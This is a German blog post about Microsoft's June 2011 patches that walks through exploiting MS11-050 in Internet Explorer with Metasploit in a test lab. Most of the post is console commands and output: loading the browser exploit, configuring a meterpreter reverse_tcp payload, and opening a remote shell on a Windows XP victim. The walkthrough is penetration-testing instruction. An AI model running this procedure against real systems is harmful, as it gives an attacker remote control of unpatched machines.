MS11-050 Microsoft Juni Patchday

Beim Juni-Patchday 2011 hat Microsoft  insgesamt 16 Patches herausgegeben, die 34 Sicherheitslücken betreffen.  Dabei schließen 9 Patches kritische Sicherheitslücken, durch die Angreifer Code übers Netz ins System schleusen können. Weitere 7 Updates  hält Microsoft immerhin noch für wichtig.  Anwender der Software sollten schnellstmöglich reagieren, um nicht Opfer einer Attacke zu werden. en

Das Bulletin MS11-050 behebt die Schwachstellen im Internet Explorer der Versionen 6 bis 9. Ohne den entsprechenden Patch können sich  Besucher einer verseuchten Webseite mit Schadcode infizieren.

Das Metasploit-Framework stellt einen Exploit zur Verfügung, der diese Schwachstelle ausnutzt. Im Folgenden wird der Angriff in einer Testumgebung simuliert. Als Zielsystem wird Windows XP SP3 und der Internet Explorer 7 genutzt.

Setup in der Metasploit-Konsole:

msf > use exploit/windows/browser/ms11_050_mshtml_cobjectelement
msf exploit(ms11_050_mshtml_cobjectelement) > set URIPATH document
URIPATH => document
msf exploit(ms11_050_mshtml_cobjectelement) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms11_050_mshtml_cobjectelement) > set LPORT 4444
LPORT => 4444
msf exploit(ms11_050_mshtml_cobjectelement) > set LHOST 192.168.222.14
LHOST => 192.168.222.14
msf exploit(ms11_050_mshtml_cobjectelement) > show options 

Module options (exploit/windows/browser/ms11_050_mshtml_cobjectelement):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     document         no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.222.14   yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

									

Den Exploit starten und und warten bis sich das Ziel mittels Internet Explorer auf folgende URL verbindet:
http://192.168.222.14:8080/document

msf exploit(ms11_050_mshtml_cobjectelement) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.222.14:4444 
msf exploit(ms11_050_mshtml_cobjectelement) > [*] Using URL: http://0.0.0.0:8080/document
[*]  Local IP: http://192.168.222.14:8080/document
[*] Server started.
[*] Sending exploit for MS11-050 IE mshtml!CObjectElement Use After Free to 192.168.222.71:1029 (target: Win XP SP3 Internet Explorer 7)...
[*] Sending stage (749056 bytes) to 192.168.222.71
[*] Meterpreter session 1 opened (192.168.222.14:4444 -> 192.168.222.71:1030) at 2011-06-19 09:59:26 -0400
[*] Session ID 1 (192.168.222.14:4444 -> 192.168.222.71:1030) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (616)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 1872
[*] New server process: notepad.exe (1872)

sessions -l

Active sessions
===============

  Id  Type                   Information                      Connection
  --  ----                   -----------                      ----------
  1   meterpreter x86/win32  FDCC_XP_VHDfrank @ FDCC_XP_VHD  192.168.222.14:4444 -> 192.168.222.71:1030

msf exploit(ms11_050_mshtml_cobjectelement) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: FDCC_XP_VHDfrank
meterpreter > 

									

Im folgenden Video wird das Vorgehen in einer Testumgebung mit Backtrack5, Metasploit und Armitage gezeigt:

[youtube 5_1iJIBuROE]

Schreibe einen Kommentar

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden.